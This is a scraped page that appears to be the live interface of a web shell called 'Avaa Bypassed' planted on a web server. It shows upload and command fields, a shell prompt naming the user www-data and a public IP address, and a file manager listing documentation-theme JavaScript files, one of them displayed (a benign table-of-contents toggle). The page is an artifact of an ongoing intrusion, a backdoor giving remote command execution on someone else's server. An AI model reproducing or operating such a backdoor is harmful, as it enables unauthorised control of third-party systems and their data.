[ Avaa Bypassed ]




Upload:

Command:

www-data@3.144.81.47: ~ $
$(function() {

  var
    toc = $('#toc').show(),
    items = $('#toc > ul').hide();

  $('#toc h3')
    .click(function() {
      if (items.is(':visible')) {
        items.animate({
          height:     'hide',
          opacity:    'hide'
        }, 300, function() {
          toc.removeClass('expandedtoc');
        });
      }
      else {
        items.animate({
          height:     'show',
          opacity:    'show'
        }, 400);
        toc.addClass('expandedtoc');
      }
    });

});

Filemanager

Name Type Size Permission Actions
css3-mediaqueries.js File 14.59 KB 0644
doctools.js File 9.09 KB 0644
jquery.js File 265.39 KB 0644
searchtools.js File 14.71 KB 0644
sidebar.js File 4.69 KB 0644
theme_extras.js File 504 B 0644
underscore.js File 57.5 KB 0644